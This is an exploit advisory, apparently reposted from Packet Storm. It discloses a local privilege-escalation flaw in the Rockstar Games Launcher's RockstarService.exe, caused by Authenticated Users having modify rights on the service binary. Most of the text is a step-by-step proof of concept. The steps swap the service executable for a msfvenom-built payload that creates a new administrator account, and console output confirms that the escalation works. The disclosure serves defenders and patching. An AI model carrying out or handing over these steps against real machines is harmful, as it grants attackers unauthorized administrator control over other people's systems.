Rockstar Service Insecure File Permissions ≈ Packet Storm
# Date: 2020-04-02
# Exploit Author: George Tsimpidas
# Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher
# Version Patch: 1.0.37.349
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362
Vulnerability Description:
RockstarService.exe suffers from an elevation of privileges vulnerability which can be used by an “Authenticated User” to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the “Authenticated Users Group” which grants the (M) Flag aka “Modify Privilege”
#PoC
D:Launcher> icacls .Launcher.exe
.Launcher.exe BUILTINAdministrators:(I)(F)
NT AUTHORITYSYSTEM:(I)(F)
NT AUTHORITYAuthenticated Users:(I)(M)
BUILTINUsers:(I)(RX)
#1. Create low privileged user & Login to that user
C:>net user lowpriv Password123! /add
C:>net user lowpriv | findstr /i “Membership Name” | findstr /v “Full”
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None
#2. Move the RockstarService.exe to a new name
D:Launcher> move RockstarService.exe RockstarService.exe.bk
1 file(s) moved.
#3. Create malicious binary on kali linux with MSF
msfvenom -f exe -p windows/exec CMD=”net user placebo Password123! /add && net localgroup Administrators placebo /add” -o RockstarService.exe
#4. Transfer created ‘RockstarService.exe’ to the Windows Host
#5. Move the created ‘RockstarService.exe’ binary to the ‘D:Launcher’ to replace the old one
#6. Now start the Service
Command : net start ‘Rockstar Service’
Now check out that the user has been registered to the system and added to the local group of Administrators
C:Userslowpriv>net user placebo | findstr /i “Membership Name” | findstr
/v “Full”
User name placebo
Local Group Memberships *Administrators *Users
Global Group memberships *None
Comments